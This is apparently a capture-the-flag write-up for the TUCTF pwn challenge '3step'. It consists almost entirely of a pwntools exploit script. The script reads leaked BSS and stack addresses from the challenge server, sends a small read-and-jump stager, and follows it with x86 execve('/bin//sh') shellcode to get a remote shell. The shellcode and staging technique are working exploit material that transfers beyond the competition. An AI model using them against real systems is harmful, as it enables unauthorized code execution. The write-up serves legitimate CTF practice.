3step
[pwn]
3step
Gonna have to get crafty with this one.
nc chal.tuctf.com 30504
Code
from pwn import *
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
print len(shellcode)
#c = process("./3step")
c = remote("chal.tuctf.com", 30504)
c.readuntil("snacks\n")
addr_bss = int(c.readuntil("\n").strip("\n"), 0)
addr_stack = int(c.readuntil("\n\n").strip("\n"), 0)
stager = "\x31\xc0\x31\xdb\xb0\x03\xb9"
stager += struct.pack("<L", addr_stack)
stager += "\xb2\xff\xcd\x80\xff\xe1"
print "BSS : %08x" % (addr_bss)
print "STACK: %08x" % (addr_stack)
c.readuntil("Step 1: ")
c.send(stager)
c.readuntil("Step 2: ")
c.send("X\n")
c.readuntil("Step 3: ")
c.send(struct.pack("<L", addr_bss))
c.send(shellcode)
c.interactive()